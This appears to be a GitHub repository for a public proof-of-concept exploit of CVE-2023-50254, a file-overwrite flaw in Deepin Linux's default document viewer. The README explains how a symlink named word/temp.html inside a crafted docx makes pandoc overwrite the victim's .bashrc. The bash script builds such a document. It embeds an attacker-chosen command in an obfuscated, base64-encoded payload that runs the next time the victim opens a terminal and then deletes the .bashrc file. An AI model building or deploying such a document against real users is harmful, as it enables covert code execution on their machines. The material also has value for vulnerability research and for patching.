├── README.md └── deepin-reader_exploit.sh /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-50254 - Deepin Linux's default document viewer deepin-reader RCE 2 | CVE-2023-50254: PoC Exploit for Deepin-reader RCE that affects unpatched Deepin Linux Desktops. Deepin Linux's default document reader "deepin-reader" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document. 3 | 4 | Details 5 | 6 | Deepin-reader is the default document reader for the Operating System Deepin Linux. The deepin-reader performs some shell command operations while dealing with docx document format. 7 | 8 | 1. When opening a docx document , deepin-reader creates a temporary directory under /tmp and places the docx document under the directory 9 | 10 | 2. Then deepin-reader calls the "unzip" shell command to extract the docx file 11 | 12 | 3. After the extraction process, deepin-reader calls "pandoc" command to convert the docx file to an html file named "temp.html" under word/ directory (created when the docx file is extracted with unzip). The command will look something like this, "pandoc temp.docx -o word/temp.html 13 | 14 | 4. Then deepin-reader will try to convert that HTML file to pdf and open the pdf. 15 | 16 | This happens when we open a docx file in Deepin Linux OS. 17 | ![image](https://github.com/febinrev/deepin-linux_reader_RCE-exploit/assets/52229330/57fed21a-025b-44d6-83fc-1ab51b2a8946) 18 | 19 | This behavior can be exploited by placing a symlink named word/temp.html inside a crafted malicious docx pointing to any file inside the target system. 20 | 21 | So, while opening the docx file, pandoc will write to the system file that the symlink word/temp.html is pointing to. 22 | 23 | 24 | This is a File overwrite vulnerability. 25 | A Remote Code Execution can be achieved by overwriting files like .bash_rc, .bash_login, etc. Rce will be triggered when the user opens the terminal. 26 | 27 | 28 | Advisory: https://github.com/linuxdeepin/developer-center/security/advisories/GHSA-q9jr-726g-9495 29 | -------------------------------------------------------------------------------- /deepin-reader_exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | myBanner(){ 4 | echo " 5 | ╔╦╗┌─┐┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐ 6 | ║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘ 7 | ═╩╝└─┘└─┘┴ ┴┘└┘ ╩╚═└─┘┴ ┴─┴┘└─┘┴└─ 8 | ╦═╗╔═╗╔═╗ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐ 9 | ╠╦╝║ ║╣ ║╣ ┌┴┬┘├─┘│ │ ││ │ 10 | ╩╚═╚═╝╚═╝ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴ 11 | 0-day 12 | 13 | [Affected Operating System: Deepin Linux] 14 | -by Febin (@febin_nj) 15 | " 16 | 17 | } 18 | 19 | checkPandoc(){ 20 | 21 | if [ $(which pandoc) ] 22 | then 23 | echo "[+] Pandoc is installed!" 24 | else 25 | echo "[-] Pandoc is not installed! Install pandoc to run this exploit.." 26 | exit 27 | fi 28 | } 29 | 30 | mainProgram(){ 31 | 32 | printf " 33 | 34 | [ This Exploit will craft a malicious document (.docx) from the specified TEXT file and store the malicious docx under output/ directory ] 35 | 36 | " 37 | mkdir output 2>/dev/null 38 | 39 | printf " [>] Path to your TEXT file (default = ./sample.txt): " 40 | read html_file 41 | html_file=${html_file:-./sample.txt} 42 | 43 | printf " [>] Enter the target username: " 44 | read username 45 | 46 | printf " [>] Enter the oneliner command to execute on target: " 47 | read cmd 48 | 49 | if [ -e "$html_file" ] 50 | then 51 | cp "$html_file" out.html 52 | else 53 | echo "[-] The specified txt file doesn't exist!" 54 | exit 55 | fi 56 | 57 | b64cmd=$(echo "$cmd"|base64) 58 | 59 | payload="

/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #

" 60 | echo "${payload}$(printf '\n') $(cat out.html)" > out.html 61 | 62 | pandoc out.html -o output/mal.docx 63 | #pandoc output/mal.docx -o output/mal.html 64 | 65 | rm -rf out.html 66 | mkdir word 2>/dev/null 67 | 68 | ln -s /home/${username}/.bashrc word/temp.html 69 | zip -u -y output/mal.docx word/temp.html >/dev/null 70 | 71 | rm -rf word/ 72 | 73 | echo "[+] Malicious document is written to: $(realpath output/mal.docx)" 74 | 75 | } 76 | 77 | myBanner 78 | checkPandoc 79 | mainProgram 80 | --------------------------------------------------------------------------------